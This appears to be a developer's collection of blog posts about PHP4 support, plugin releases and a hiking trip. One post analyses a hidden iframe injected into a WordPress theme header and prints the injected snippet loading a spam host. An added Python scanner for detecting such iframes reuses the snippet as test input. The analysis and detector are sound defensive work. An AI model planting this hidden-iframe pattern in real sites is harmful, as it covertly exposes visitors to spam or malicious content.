PHP4 Support Ended

Starting immediately, PHP4 environments will not be supported for any of my projects. If you are still running PHP4, please upgrade to PHP5. Most web hosts offer concurrent PHP4 and PHP5 support, inquire about upgrading to PHP5.

-John Havlik

[end of transmission, stay tuned]

Klikvp.com Exploit

Even though things are updated regularly on this blog, an iframe-based exploit was discovered today. Unlike the previous iframe attack, which came through a SQL injection, this one involved modified theme files. Also unlike the previous googlerank.info iframe attack, this one’s payload does not appear to be malicious; rather, it is spammy.

There are a few things that point to some level of sophistication in the injection. First off, the code was injected at the end of the header.php file, and only in the active theme. Typically, a script kiddie will not bother figuring out which theme is in use and will instead carpet bomb the place with malicious code. Secondly, the modification date on the file matches the last time the header was uploaded from the testbed. No, the testbed’s code was not compromised. This points to a possible Windows exploit (yes, the Weblogs.us server still runs on Windows, unfortunately), as any change should have caused the modification date and time to update. Finally, rather than hiding the iframe itself via CSS, the attacker hid a container div wrapping it, which makes it more difficult to write a general CSS rule that exposes the iframe.

< div style="display:none" >< iframe src="http://klikvp.com/css/go.php?sid=1" frameborder="0" height="1" width="1" >< /iframe >< /div >

That is the offending code. Spaces were added to prevent execution. Klikvp is the same as Klikvip, which is a known spammer. The tricky sucker is using a wrapping div now. The good news is that WordPress Exploit Scanner will find this, so keeping it around and periodically scanning is a good thing to do. It doesn’t offer dashboard notifications like Iframe-b-gone does, but it scans files and other things that Iframe-b-gone does not.

-John Havlik

[end of transmission, stay tuned]
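The Klikvp.com post above describes the detection problem: the iframe itself carries no hiding CSS, so a rule or scanner that only looks for `display:none` on the iframe tag misses it, and the file's modification time was of no help either. Below is an added example (written for this page, not code from the post, from WordPress Exploit Scanner or from Iframe-b-gone) of a small Python scanner that walks a theme directory, parses each PHP/HTML file, and flags every iframe that is hidden on itself, hidden by any ancestor element, or sized 1x1. The theme directory layout and the injected `header.php` tail are constructed sample input modelled on the snippet in the post; the host name is taken from that snippet.

```python
"""Scan WordPress theme files for injected iframes, including ones that are
hidden by a wrapping container rather than by CSS on the iframe itself.
Added example for this page; not the blog's or any plugin's own code."""
import os
import re
import tempfile
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample input: the tail of a header.php with the injection from
# the post (no spaces inserted here; this string is never served as a page).
INJECTED_TAIL = (
    '<?php wp_head(); ?>\n</head>\n<body>\n'
    '<div style="display:none"><iframe src="http://klikvp.com/css/go.php?sid=1" '
    'frameborder="0" height="1" width="1"></iframe></div>\n'
)
CLEAN_TAIL = '<?php wp_head(); ?>\n</head>\n<body>\n'

HIDDEN_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def _tiny(value):
    """True for a width/height attribute of 1px or less."""
    try:
        return int(str(value).strip().rstrip("px")) <= 1
    except ValueError:
        return False


class IframeFinder(HTMLParser):
    """Records every iframe together with whether it or an ancestor is hidden."""

    def __init__(self):
        super().__init__()
        self.stack = []   # open elements as (tag, is_hidden)
        self.hits = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        hidden = bool(HIDDEN_RE.search(a.get("style") or ""))
        if tag == "iframe":
            src = a.get("src") or ""
            self.hits.append({
                "line": self.getpos()[0],
                "src": src,
                "host": urlparse(src).hostname or "",
                "hidden_self": hidden,
                # the case from the post: the wrapping div, not the iframe, is hidden
                "hidden_ancestor": any(h for _, h in self.stack),
                "tiny": _tiny(a.get("width")) and _tiny(a.get("height")),
            })
        self.stack.append((tag, hidden))

    def handle_endtag(self, tag):
        for i in range(len(self.stack) - 1, -1, -1):
            if self.stack[i][0] == tag:
                del self.stack[i:]
                break


def find_iframes(html):
    p = IframeFinder()
    p.feed(html)
    p.close()
    return p.hits


def suspicious(hit):
    return hit["hidden_self"] or hit["hidden_ancestor"] or hit["tiny"]


def scan_theme(theme_dir):
    """Return suspicious iframes found in .php/.html files under theme_dir."""
    findings = []
    for root, _, files in os.walk(theme_dir):
        for name in files:
            if not name.endswith((".php", ".html", ".htm")):
                continue
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for hit in find_iframes(fh.read()):
                    if suspicious(hit):
                        hit["file"] = os.path.relpath(path, theme_dir)
                        # reported for context only: as the post notes, an
                        # unchanged mtime does not prove the file is clean
                        hit["mtime"] = os.path.getmtime(path)
                        findings.append(hit)
    return findings


def demo():
    """Build a two-theme layout (assumed, for illustration) and scan it."""
    with tempfile.TemporaryDirectory() as d:
        os.makedirs(os.path.join(d, "active"))
        os.makedirs(os.path.join(d, "unused"))
        with open(os.path.join(d, "active", "header.php"), "w") as fh:
            fh.write(INJECTED_TAIL)
        with open(os.path.join(d, "unused", "header.php"), "w") as fh:
            fh.write(CLEAN_TAIL)
        return scan_theme(d)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['file']}:{f['line']} iframe -> {f['host']} "
              f"(hidden itself: {f['hidden_self']}, hidden ancestor: "
              f"{f['hidden_ancestor']}, 1x1: {f['tiny']})")
```

Run it against `wp-content/themes` to check every theme, not just the active one; the parser tracks the open-element stack, so a hidden `<div>` or `<span>` several levels above the iframe still trips `hidden_ancestor`, which is exactly what a CSS-only rule on `iframe` cannot catch.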

A Major Shift

As stated before, Breadcrumb NavXT 2.2 will be vastly different from 2.1, especially API-wise. Work is underway on the core, which, once stabilized, will allow work on the administrative interface to take place. This is the second major rewrite of the plug-in in the last year. Previously, the modifications to the core were made to aid in adding features and to make the core easier to modify. However, there were some shortcomings, which should be overcome by the new, more object-oriented approach. So far this is the short list of what is changing:

  • Anchor templates – akin to WordPress’ custom permalink structure, this allows more flexibility (e.g. it allows users to set the rel attribute, among other things).
  • Streamlining of the options – options deprecated due to the use of anchor templates, ones that are now already set in WordPress (e.g. the static front page option), and ones that were deprecated due to structural changes. The current short list of deprecated options includes:
    • URL Title Prefix – obsolete due to anchor templates
    • URL Title Suffix – obsolete due to anchor templates
    • Static Front Page – deprecated in 2.1.3, since this can now be determined automatically thanks to the WordPress setting “Front page displays” under Settings > Reading.
    • Current Item URL Title – obsolete due to anchor templates
    • Archive by Date Format – reassigned; it now selects between hierarchical date archiving (multiple breadcrumbs in the trail) and the old method, which follows the format specified in the WordPress setting “Date Format” under Settings > General.
  • Deeper WordPress integration – beyond the removal of duplicated options, extensive use of filters should alleviate problems with plugins such as Polyglot and qTranslate (previous support was via “hacks”).
  • Reorganization of the administrative interface – not only are the options streamlined, but option names are more obvious and grouped in a more appropriate manner. The interface is also tabbed into several virtual pages thanks to some JavaScript magic. This considerably shortens the apparent size of the options page.
  • New classes – a breadcrumb class and a breadcrumb trail class combine to make the plugin as a whole much more flexible. Unfortunately, this means that directly accessing the class does change between 2.1 and 2.2, which will require attention from users who do so.

Additionally, a WordPress sidebar widget plugin will be shipped with 2.2.0. This will remove the need for some users to ever touch a theme file, as long as their theme supports sidebar widgets. By this weekend the new core on SVN will be usable; as the bugs are worked out, the administrative interface will receive the attention it needs. Around August 8th a beta will be available. For this much change it is of the utmost importance that some serious testing is done before a formal release is made. If you would like to help test, stay tuned for a post announcing the beta, and report back on your experience.

-John Havlik

[end of transmission, stay tuned]

Back From Elevation

Going into work this morning was less than desirable. After a week in Colorado, the humidity of Minnesotan summers seems unbearable. The trip was nice, even though it rained on us just about every day, and no, I’m not talking about the typical 5:00pm rains.

We made it up to the ~14,000ft summit of Mt. Sneffels. There was a nice 100ft patch of melting snow near the summit that we climbed through while ascending. While my old ASICS GT-2100 running shoes were fine for most of the climb, they lacked proper tread for snow. Thus, it was necessary to use both hands and feet to keep climbing without sliding down. Luckily, a few other groups knew a much better route for the descent, which completely avoided the snow. In its place was a nice two-foot-wide shelf above a 50ft or so cliff. It was not snow, and thus was not a problem.

There are many more pictures from the trip. I’ll eventually get a pictures page up with the pictures from this trip and from Moab, Utah last year.

I found the manual mode for the SD850, which really helped with the grainy image problems I was having before. Tweaking some other settings further reduced the graininess, to the point that point-n-shoot auto mode produced pretty good pictures. All in all, the camera is pretty good; it is just different from the previous PowerShots I had.

-John Havlik

[end of transmission, stay tuned]

Mtekk’s Testimonials 1.1.0

Available immediately, Mtekk’s Testimonials 1.1.0 is a substantial improvement over the previous release. This release migrates from MooTools 1.11 to MooTools 1.2. Requiring a particular domain or TLD is now optional. JavaScript dependencies are now handled elegantly through WordPress’ methods. Finally, errors in form entry are now reported more elegantly to the user in a list above the form. Invalid form entries are marked as members of the ‘merror’ CSS class. Valid entries retain their data.

-John Havlik

[end of transmission, stay tuned]
